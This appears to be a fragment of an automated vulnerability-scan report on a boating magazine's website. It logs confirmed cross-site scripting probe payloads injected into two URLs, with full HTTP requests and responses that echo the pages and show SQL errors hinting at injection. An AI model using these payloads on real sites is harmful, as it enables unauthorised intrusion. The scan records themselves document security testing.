<area shape="rect" coords="0,0,130,40" href="http://www.soundingsonline.com/index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111" alt="Buy a Boat" onmouseover="rollOn('nav1'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="131,0,241,40" href="http://www.soundingssellmyboat.com/" target="_blank" alt="Sell a Boat" onmouseover="rollOn('nav2'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="242,0,357,40" href="http://www.soundingsonline.com/component/content/article/237622" alt="Service Directory" onmouseover="rollOn('nav3'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="358,0,471,40" href="http://www.soundingsonline.com/Waterfront/default.html" target="_blank" alt="Waterfront Property" onmouseover="rollOn('nav4'); return true;" onmouseout="rollOff(); return true;" />
</map>

<img name="navs" src="//www.soundingsonline.com/templates/soundings1/images/header_tabs.jpg" width="471" height="41" usemap="#tabsMap" border="0" alt="Buy a Boat Online Search, Sell a Boat Classifieds, Boat Locker Marketplace, Waterfront Property" />
</div>

<ul class="menu sf-menu" id="mainnav"><li id="current" class="active item1 active1"><a href="http://www.soundingsonline.com/"><span>Home</span></a></li><li class="parent item53"><a href="/news"><span>News</span></a><ul><li class="item115"><a href="/news/coastwise"><span>Coastwise</span></a></li><li class="item84"><a href="/news/todays-top-stories"><span>Today's Top Stories</span></a></li><li class="item86"><a href="/news/home-waters"><span>Home Waters</span></a></li><li class="item85"><a href="/news/mishaps-a-rescues"><span>Mishaps &amp; Rescues</span></a></li><li class="item88"><a href="/news/sailing"><span>Sailing</span></a></li><li class="item222"><a href="/news/dispatches"><span>Dispatches</span></a></li></ul></li><li class="parent item59"><a href="/boat-shop"><span>Boat Shop</span></a><ul><li class="item79"><a href="/boat-shop/sea-savvy"><span>Sea Savvy</span></a></li><li class="item93"><a href="/boat-shop/know-how"><span>Know-How</span></a></li><li class="item94"><a href="/boat-shop/q-a-a"><span>Q &amp; A</span></a></li><li class="item62"><a href="/boat-shop/new-boats"><span>New Boats</span></a></li><li class="item81"><a href="/boat-shop/on-powerboats"><span>On Powerboats</span></a></li><li class="item95"><a href="/boat-shop/on-sailboats"><span>On Sailboats</span></a></li><li class="item63"><a href="/boat-shop/used-boat-review"><span>Used Boat Review</span></a></li><li class="item64"><a href="/boat-shop/new-gear"><span>New Gear</span></a></li><li class="item152"><a href="/boat-shop/tech-talk"><span>Tech Talk</span></a></li></ul></li><li class="parent item65"><a href="/columns-blogs"><span>Columns/Blogs</span></a><ul><li class="item97"><a href="/columns-blogs/under-way"><span>Under Way</span></a></li><li class="item102"><a href="/columns-blogs/books"><span>Books</span></a></li><li class="item98"><a href="/columns-blogs/bay-tripper"><span>Bay Tripper</span></a></li><li class="item99"><a href="/columns-blogs/new-england-fishing"><span>New England Fishing</span></a></li></ul></li><li class="parent item67"><a href="/features"><span>Features</span></a><ul><li class="item89"><a href="/features/destinations"><span>Destinations</span></a></li><li class="item92"><a href="/features/in-depth"><span>In Depth</span></a></li><li class="item91"><a href="/features/type-of-boat"><span>Type of Boat</span></a></li><li class="item90"><a href="/features/profiles"><span>Profiles</span></a></li><li class="item112"><a href="/features/lifestyle"><span>Lifestyle</span></a></li><li class="item162"><a href="/features/technical"><span>Technical</span></a></li><li class="item103"><a href="/features/justyesterday"><span>Just Yesterday</span></a></li></ul></li><li class="item83"><a href="/calendar"><span>Calendar</span></a></li><li class="parent item68"><a href="/subscription-services"><span>Subscription Services</span></a><ul><li class="item113"><a href="http://www.soundingsonline.com/index.php?option=com_chronocontact&amp;chronoformname=CGPage"><span>C.G. Aux.</span></a></li><li class="item163"><a href="http://www.soundingsonline.com/component/chronocontact/?chronoformname=PSPage"><span>U.S. Power Squadron</span></a></li><li class="item69"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=XX&amp;PGTP=A"><span>Missing/Damaged Issue</span></a></li><li class="item73"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=AC&amp;PGTP=A"><span>Address/Email change</span></a></li><li class="item75"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=5U6&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QR&amp;PGTP=A"><span>Renew</span></a></li><li class="item76"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=SND&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>Give a Gift</span></a></li><li class="item77"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>Subscribe</spa..
- /features/destinations

/features/destinations CONFIRMED

http://www.soundingsonline.com/features/destinations?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ea..

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x00209C)</script>

Request

GET /features/destinations?'"--></style></script><script>netsparker(0x00209C)</script> HTTP/1.1
Referer: http://www.soundingsonline.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.soundingsonline.com
Cookie: d4dad6935f632ac35975e3001dc7bbe8=nrjskmc2lloa5mrm1f2a65vm63
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:31:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET,PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:31:59 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache


<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x00209C)</script>' AND cookie_info=''' at line 1</font>]</font></blockquote><blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x00209C)</script>','','1')' at line 1</font>]</font></blockquote><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

<head>
<base href="http://www.soundingsonline.com/features/destinations" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta name="robots" content="index, follow" /> <meta name="keywords" content="Boating articles, boating, boats, marine industry, recreational boating, Boat shows, Yachts, used boats, new boats, used boat sales, new boat sales, boat classifieds, boats for sale, boat broker, boat reviews, boating magazine, boat features,nautical almanac, cruising, sailboat, powerboat,motor yacht, yacht, coast guard, coastguard, Northeast boating, Florida boating, gulf coast boating, Atlantic ocean boating, boating vacation, trawler, boat navigation, boat engines, boat motors, boat electronics, boat gear, boat accessories, boat safety,boating regulations, boating events" /> <meta name="description" content="SoundingsOnline features complete information and entertainment for recreational boaters, including breaking news, boating destinations, boats for sale, new boats and gear, and a complete calendar of boat shows and yachting events. News and feature articles about local people, boats and events are covered in our regional Home Waters section. Thousands of boats for sale; hundreds of waterfront homes." /> <meta name="generator" content="Joomla! 1.5 - Open Source Content Management" /> <title>Boating Destination Reviews for Travelers Along the Eastern Seaboard</title> <link href="/features/destinations?format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" /> <link href="/features/destinations?format=feed&amp;type=atom" rel="alternate" type="application/atom+xml" title="Atom 1.0" /> <link href="/templates/soundings1/favicon.ico" rel="shortcut icon" type="image/x-icon" /> <link rel="stylesheet" href="http://www.soundingsonline.com/components/com_yvcomment/assets/style001.css" type="text/css" /> <script type="text/javascript" src="/media/system/js/mootools.js"></script> <script type="text/javascript" src="/media/system/js/caption.js"></script>

<meta name="verify-v1" content="l1mWAXJWn7Xr+Frn4D39PflSoePEdoO72UMDIxIVjvk=" />

<link rel="stylesheet" href="/templates/system/css/system.css" type="text/css" />
<link rel="stylesheet" href="/templates/system/css/general.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/allstyles.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/navbar.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/editor.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/print.css" type="text/css" media="print" />
<link rel="stylesheet" type="text/css" href="/shadowbox/shadowbox.css" />
<link rel="stylesheet" href="/templates/soundings1/css/fadw.css" type="text/css" media="screen,projection" />
<!--[if lte IE 6]>
<link href="/templates/soundings1/css/ieonly.css" rel="stylesheet" type="text/css" />
<![endif]-->
<!--[if IE 7]>
<link href="/templates/soundings1/css/ie7only.css" rel="stylesheet" type="text/css" />
<![endif]-->

<script type="text/javascript" src="/shadowbox/shadowbox.js"></script>
<script type="text/javascript">
Shadowbox.init({
players: ["img","flv","iframe"]
});
</script>

<script src="/templates/soundings1/javascript/allscripts.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/fadw.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/suckerfish_menu.js" type="text/javascript"></script>
<script language="JavaScript" type="text/javascript" src="//www.soundingsonline.com/s_code.js"></script>

<!------ OAS SETUP begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
//configuration
OAS_url = 'http://oasc05139.247realmedia.com/RealMedia/ads/';
OAS_sitepage = 'www.soundingsonline.com/index.php';
OAS_listpos = 'Top,Middle,Right,Right1,x01,x02,x03,x04';
OAS_query = '';
OAS_target = '_top';
//end of configuration
OAS_version = 10;
OAS_rn = '001234567890'; OAS_rns = '1234567890';
OAS_rn = new String (Math.random()); OAS_rns = OAS_rn.substring (2, 11);
function OAS_NORMAL(pos) {
document.write('<A HREF="' + OAS_url + 'click_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" TARGET=' + OAS_target + '>');
document.write('<IMG SRC="' + OAS_url + 'adstream_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" BORDER=0></A>');
}
//-->
</SCRIPT>
<SCRIPT LANGUAGE=JavaScript1.1>
<!--
OAS_version = 11;
if ((navigator.userAgent.indexOf('Mozilla/3') != -1) || (navigator.userAgent.indexOf('Mozilla/4.0 WebTV') != -1))
OAS_version = 10;
if (OAS_version >= 11)
document.write('<SCR' + 'IPT LANGUAGE=JavaScript1.1 SRC="' + OAS_url + 'adstream_mjx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '?' + OAS_query + '"><\/SCRIPT>');//-->
</SCRIPT><SCRIPT LANGUAGE=JavaScript>
<!--
document.write('');
function OAS_AD(pos) {
if (OAS_version >= 11)
OAS_RICH(pos);
else
OAS_NORMAL(pos);
} //-->
</SCRIPT>
<!------ OAS SETUP end ------>

</head>


<body class="s_features c_destinations m_destinations"><!--
Type of page: category<br />Section: 5, s_features<br />Category: 40, c_destinations<br />Menu: 89, m_destinations-->
<!--
The name of this site is Soundings Online<br />
The administrator email is e.cirillo@soundingspub.com<br />
This template is in the soundings1 directory<br />
The URL is http://www.soundingsonline.com/-->

<div id="all">
<div id="header">
<div id="leaderboard">
<!------ OAS AD 'Top' begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
OAS_AD('Top');
//-->
</SCRIPT>
<!------ OAS AD 'Top' end ------>
</div>

<div id="search_bar">
<ul class="menu"><li class="item60"><a href="/archives"><span>Archives</span></a></li><li class="item105"><a href="http://www.barkerstores.com/soundings" target="_blank"><span>Buy Soundings Gear</span></a></li><li class="item106"><a href="/advertise"><span>Advertise</span></a></li></ul><!-- Extra Menu -->
<form action="index.php" method="post"> <div class="search"> <input name="searchword" id="mod_search_searchword" maxlength="30" alt="Search" class="inputbox" type="text" size="30" value="Search..." onblur="if(this.value=='') this.value='Search...';" onfocus="if(this.value=='Search...') this.value='';" /><input type="submit" value="Search" class="button" onclick="this.form.searchword.focus();"/> </div> <input type="hidden" name="task" value="search" /> <input type="hidden" name="option" value="com_search" /></form><!-- Search -->
</div> <!-- end search_bar -->

<h1 id="logo"><a href="/index.php"><img src="/templates/soundings1/images/snd_logo.jpg" alt="Soundings" /></a></h1>
<!--<div id="sub_cover"><a href="/"><img src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" /></a></div>-->

<div id="sub_cover">
<map name="subCoverMap" id="subCovers">
<area shape="rect" coords="2,130,83,152" href="http://www.soundingsonline.com/subscription-services" alt="Subscribe" />
<area shape="rect" coords="84,122,164,152" href="http://www.soundingsonline.com/subscription-services/preview-current-issue" alt="Preview Current Issue" />
<img name="subCover" src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" usemap="#subCoverMap" border="0" />
</map>
</div>

<div id="tabs">
<map name="tabsMap" id="tabsMap">
<area shape="rect" coords="0,0,130,40" href="http://www.soundingsonline.com/index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111" alt="Buy a Boat" onmouseover="rollOn('nav1'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="131,0,241,40" href="http://www.soundingssellmyboat.com/" target="_blank" alt="Sell a Boat" onmouseover="rollOn('nav2'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="242,0,357,40" href="http://www.soundingsonline.com/component/content/article/237622" alt="Service Directory" onmouseover="rollOn('nav3'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="358,0,471,40" href="http://www.soundingsonline.com/Waterfront/default.html" target="_blank" alt="Waterfront Property" onmouseover="rollOn('nav4'); return true;" onmouseout="rollOff(); return true;" />
</map>

<img name="navs" src="//www.soundingsonline.com/templates/soundings1/images/header_tabs.jpg" width="471" height="41" usemap="#tabsMap" border="0" alt="Buy a Boat Online Search, Sell a Boat Classifieds, Boat Locker Marketplace, Waterfront Property" />
</div>

<ul class="menu sf-menu" id="mainnav"><li id="current" class="active item1 active1"><a href="http://www.soundingsonline.com/"><span>Home</span></a></li><li class="parent item53"><a href="/news"><span>News</span></a><ul><li class="item115"><a href="/news/coastwise"><span>Coastwise</span></a></li><li class="item84"><a href="/news/todays-top-stories"><span>Today's Top Stories</span></a></li><li class="item86"><a href="/news/home-waters"><span>Home Waters</span></a></li><li class="item85"><a href="/news/mishaps-a-rescues"><span>Mishaps &amp; Rescues</span></a></li><li class="item88"><a href="/news/sailing"><span>Sailing</span></a></li><li class="item222"><a href="/news/dispatches"><span>Dispatches</span></a></li></ul></li><li class="parent item59"><a href="/boat-shop"><span>Boat Shop</span></a><ul><li class="item79"><a href="/boat-shop/sea-savvy"><span>Sea Savvy</span></a></li><li class="item93"><a href="/boat-shop/know-how"><span>Know-How</span></a></li><li class="item94"><a href="/boat-shop/q-a-a"><span>Q &amp; A</span></a></li><li class="item62"><a href="/boat-shop/new-boats"><span>New Boats</span></a></li><li class="item81"><a href="/boat-shop/on-powerboats"><span>On Powerboats</span></a></li><li class="item95"><a href="/boat-shop/on-sailboats"><span>On Sailboats</span></a></li><li class="item63"><a href="/boat-shop/used-boat-review"><span>Used Boat Review</span></a></li><li class="item64"><a href="/boat-shop/new-gear"><span>New Gear</span></a></li><li class="item152"><a href="/boat-shop/tech-talk"><span>Tech Talk</span></a></li></ul></li><li class="parent item65"><a href="/columns-blogs"><span>Columns/Blogs</span></a><ul><li class="item97"><a href="/columns-blogs/under-way"><span>Under Way</span></a></li><li class="item102"><a href="/columns-blogs/books"><span>Books</span></a></li><li class="item98"><a href="/columns-blogs/bay-tripper"><span>Bay Tripper</span></a></li><li class="item99"><a href="/columns-blogs/new-england-fishing"><span>New England Fishing</span></a></li></ul></li><li class="parent item67"><a href="/features"><span>Features</span></a><ul><li class="item89"><a href="/features/destinations"><span>Destinations</span></a></li><li class="item92"><a href="/features/in-depth"><span>In Depth</span></a></li><li class="item91"><a href="/features/type-of-boat"><span>Type of Boat</span></a></li><li class="item90"><a href="/features/profiles"><span>Profiles</span></a></li><li class="item112"><a href="/features/lifestyle"><span>Lifestyle</span></a></li><li class="item162"><a href="/features/technical"><span>Technical</span></a></li><li class="item103"><a href="/features/justyesterday"><span>Just Yesterday</span></a></li></ul></li><li class="item83"><a href="/calendar"><span>Calendar</span></a></li><li class="parent item68"><a href="/subscription-services"><span>Subscription Services</span></a><ul><li class="item113"><a href="http://www.soundingsonline.com/index.php?option=com_chronocontact&amp;chronoformname=CGPage"><span>C.G. Aux.</span></a></li><li class="item163"><a href="http://www.soundingsonline.com/component/chronocontact/?chronoformname=PSPage"><span>U.S. Power Squadron</span></a></li><li class="item69"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=XX&amp;PGTP=A"><span>Missing/Damaged Issue</span></a></li><li class="item73"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=AC&amp;PGTP=A"><span>Address/Email change</span></a></li><li class="item75"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=5U6&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QR&amp;PGTP=A"><span>Renew</span></a></li><li class="item76"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=SND&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>Give a Gift</span></a></li><li class="item77"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&am..
- /component/chronocontact/

/component/chronocontact/ CONFIRMED

http://www.soundingsonline.com/component/chronocontact/?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%..

Parameters

Parameter Type Value
chronoformname GET PSPage
Query Based QUERYSTRING '"--></style></script><script>alert(0x002101)</script>

Request

GET /component/chronocontact/?'"--></style></script><script>netsparker(0x002101)</script> HTTP/1.1
Referer: http://www.soundingsonline.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.soundingsonline.com
Cookie: d4dad6935f632ac35975e3001dc7bbe8=nrjskmc2lloa5mrm1f2a65vm63
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:32:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET,PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:32:12 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache


<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x002101)</script>' AND cookie_info=''' at line 1</font>]</font></blockquote><blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x002101)</script>','','1')' at line 1</font>]</font></blockquote><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

<head>
<base href="http://www.soundingsonline.com/component/chronocontact/" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta name="robots" content="index, follow" /> <meta name="keywords" content="Boating articles, boating, boats, marine industry, recreational boating, Boat shows, Yachts, used boats, new boats, used boat sales, new boat sales, boat classifieds, boats for sale, boat broker, boat reviews, boating magazine, boat features,nautical almanac, cruising, sailboat, powerboat,motor yacht, yacht, coast guard, coastguard, Northeast boating, Florida boating, gulf coast boating, Atlantic ocean boating, boating vacation, trawler, boat navigation, boat engines, boat motors, boat electronics, boat gear, boat accessories, boat safety,boating regulations, boating events" /> <meta name="description" content="SoundingsOnline features complete information and entertainment for recreational boaters, including breaking news, boating destinations, boats for sale, new boats and gear, and a complete calendar of boat shows and yachting events. News and feature articles about local people, boats and events are covered in our regional Home Waters section. Thousands of boats for sale; hundreds of waterfront homes." /> <meta name="generator" content="Joomla! 1.5 - Open Source Content Management" /> <title>Soundings Online</title> <link href="/templates/soundings1/favicon.ico" rel="shortcut icon" type="image/x-icon" />

<meta name="verify-v1" content="l1mWAXJWn7Xr+Frn4D39PflSoePEdoO72UMDIxIVjvk=" />

<link rel="stylesheet" href="/templates/system/css/system.css" type="text/css" />
<link rel="stylesheet" href="/templates/system/css/general.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/allstyles.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/navbar.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/editor.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/print.css" type="text/css" media="print" />
<link rel="stylesheet" type="text/css" href="/shadowbox/shadowbox.css" />
<link rel="stylesheet" href="/templates/soundings1/css/fadw.css" type="text/css" media="screen,projection" />
<!--[if lte IE 6]>
<link href="/templates/soundings1/css/ieonly.css" rel="stylesheet" type="text/css" />
<![endif]-->
<!--[if IE 7]>
<link href="/templates/soundings1/css/ie7only.css" rel="stylesheet" type="text/css" />
<![endif]-->

<script type="text/javascript" src="/shadowbox/shadowbox.js"></script>
<script type="text/javascript">
Shadowbox.init({
players: ["img","flv","iframe"]
});
</script>

<script src="/templates/soundings1/javascript/allscripts.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/fadw.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/suckerfish_menu.js" type="text/javascript"></script>
<script language="JavaScript" type="text/javascript" src="//www.soundingsonline.com/s_code.js"></script>

<!------ OAS SETUP begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
//configuration
OAS_url = 'http://oasc05139.247realmedia.com/RealMedia/ads/';
OAS_sitepage = 'www.soundingsonline.com/index.php';
OAS_listpos = 'Top,Middle,Right,Right1,x01,x02,x03,x04';
OAS_query = '';
OAS_target = '_top';
//end of configuration
OAS_version = 10;
OAS_rn = '001234567890'; OAS_rns = '1234567890';
OAS_rn = new String (Math.random()); OAS_rns = OAS_rn.substring (2, 11);
function OAS_NORMAL(pos) {
document.write('<A HREF="' + OAS_url + 'click_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" TARGET=' + OAS_target + '>');
document.write('<IMG SRC="' + OAS_url + 'adstream_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" BORDER=0></A>');
}
//-->
</SCRIPT>
<SCRIPT LANGUAGE=JavaScript1.1>
<!--
OAS_version = 11;
if ((navigator.userAgent.indexOf('Mozilla/3') != -1) || (navigator.userAgent.indexOf('Mozilla/4.0 WebTV') != -1))
OAS_version = 10;
if (OAS_version >= 11)
document.write('<SCR' + 'IPT LANGUAGE=JavaScript1.1 SRC="' + OAS_url + 'adstream_mjx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '?' + OAS_query + '"><\/SCRIPT>');//-->
</SCRIPT><SCRIPT LANGUAGE=JavaScript>
<!--
document.write('');
function OAS_AD(pos) {
if (OAS_version >= 11)
OAS_RICH(pos);
else
OAS_NORMAL(pos);
} //-->
</SCRIPT>
<!------ OAS SETUP end ------>

</head>


<body class="s_uncategorized c_uncategorized m_uncategorized"><!--
Type of page: <br />Section: , s_uncategorized<br />Category: , c_uncategorized<br />Menu: , m_uncategorized-->
<!--
The name of this site is Soundings Online<br />
The administrator email is e.cirillo@soundingspub.com<br />
This template is in the soundings1 directory<br />
The URL is http://www.soundingsonline.com/-->

<div id="all">
<div id="header">
<div id="leaderboard">
<!------ OAS AD 'Top' begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
OAS_AD('Top');
//-->
</SCRIPT>
<!------ OAS AD 'Top' end ------>
</div>

<div id="search_bar">
<ul class="menu"><li class="item60"><a href="/archives"><span>Archives</span></a></li><li class="item105"><a href="http://www.barkerstores.com/soundings" target="_blank"><span>Buy Soundings Gear</span></a></li><li class="item106"><a href="/advertise"><span>Advertise</span></a></li></ul><!-- Extra Menu -->
<form action="index.php" method="post"> <div class="search"> <input name="searchword" id="mod_search_searchword" maxlength="30" alt="Search" class="inputbox" type="text" size="30" value="Search..." onblur="if(this.value=='') this.value='Search...';" onfocus="if(this.value=='Search...') this.value='';" /><input type="submit" value="Search" class="button" onclick="this.form.searchword.focus();"/> </div> <input type="hidden" name="task" value="search" /> <input type="hidden" name="option" value="com_search" /></form><!-- Search -->
</div> <!-- end search_bar -->

<h1 id="logo"><a href="/index.php"><img src="/templates/soundings1/images/snd_logo.jpg" alt="Soundings" /></a></h1>
<!--<div id="sub_cover"><a href="/"><img src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" /></a></div>-->

<div id="sub_cover">
<map name="subCoverMap" id="subCovers">
<area shape="rect" coords="2,130,83,152" href="http://www.soundingsonline.com/subscription-services" alt="Subscribe" />
<area shape="rect" coords="84,122,164,152" href="http://www.soundingsonline.com/subscription-services/preview-current-issue" alt="Preview Current Issue" />
<img name="subCover" src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" usemap="#subCoverMap" border="0" />
</map>
</div>

<div id="tabs">
<map name="tabsMap" id="tabsMap">
<area shape="rect" coords="0,0,130,40" href="http://www.soundingsonline.com/index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111" alt="Buy a Boat" onmouseover="rollOn('nav1'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="131,0,241,40" href="http://www.soundingssellmyboat.com/" target="_blank" alt="Sell a Boat" onmouseover="rollOn('nav2'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="242,0,357,40" href="http://www.soundingsonline.com/component/content/article/237622" alt="Service Directory" onmouseover="rollOn('nav3'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="358,0,471,40" href="http://www.soundingsonline.com/Waterfront/default.html" target="_blank" alt="Waterfront Property" onmouseover="rollOn('nav4'); return true;" onmouseout="rollOff(); return true;" />
</map>

<img name="navs" src="//www.soundingsonline.com/templates/soundings1/images/header_tabs.jpg" width="471" height="41" usemap="#tabsMap" border="0" alt="Buy a Boat Online Search, Sell a Boat Classifieds, Boat Locker Marketplace, Waterfront Property" />
</div>

<ul class="menu sf-menu" id="mainnav"><li id="current" class="active item1 active1"><a href="http://www.soundingsonline.com/"><span>Home</span></a></li><li class="parent item53"><a href="/news"><span>News</span></a><ul><li class="item115"><a href="/news/coastwise"><span>Coastwise</span></a></li><li class="item84"><a href="/news/todays-top-stories"><span>Today's Top Stories</span></a></li><li class="item86"><a href="/news/home-waters"><span>Home Waters</span></a></li><li class="item85"><a href="/news/mishaps-a-rescues"><span>Mishaps &amp; Rescues</span></a></li><li class="item88"><a href="/news/sailing"><span>Sailing</span></a></li><li class="item222"><a href="/news/dispatches"><span>Dispatches</span></a></li></ul></li><li class="parent item59"><a href="/boat-shop"><span>Boat Shop</span></a><ul><li class="item79"><a href="/boat-shop/sea-savvy"><span>Sea Savvy</span></a></li><li class="item93"><a href="/boat-shop/know-how"><span>Know-How</span></a></li><li class="item94"><a href="/boat-shop/q-a-a"><span>Q &amp; A</span></a></li><li class="item62"><a href="/boat-shop/new-boats"><span>New Boats</span></a></li><li class="item81"><a href="/boat-shop/on-powerboats"><span>On Powerboats</span></a></li><li class="item95"><a href="/boat-shop/on-sailboats"><span>On Sailboats</span></a></li><li class="item63"><a href="/boat-shop/used-boat-review"><span>Used Boat Review</span></a></li><li class="item64"><a href="/boat-shop/new-gear"><span>New Gear</span></a></li><li class="item152"><a href="/boat-shop/tech-talk"><span>Tech Talk</span></a></li></ul></li><li class="parent item65"><a href="/columns-blogs"><span>Columns/Blogs</span></a><ul><li class="item97"><a href="/columns-blogs/under-way"><span>Under Way</span></a></li><li class="item102"><a href="/columns-blogs/books"><span>Books</span></a></li><li class="item98"><a href="/columns-blogs/bay-tripper"><span>Bay Tripper</span></a></li><li class="item99"><a href="/columns-blogs/new-england-fishing"><span>New England Fishing</span></a></li></ul></li><li class="parent item67"><a href="/features"><span>Features</span></a><ul><li class="item89"><a href="/features/destinations"><span>Destinations</span></a></li><li class="item92"><a href="/features/in-depth"><span>In Depth</span></a></li><li class="item91"><a href="/features/type-of-boat"><span>Type of Boat</span></a></li><li class="item90"><a href="/features/profiles"><span>Profiles</span></a></li><li class="item112"><a href="/features/lifestyle"><span>Lifestyle</span></a></li><li class="item162"><a href="/features/technical"><span>Technical</span></a></li><li class="item103"><a href="/features/justyesterday"><span>Just Yesterday</span></a></li></ul></li><li 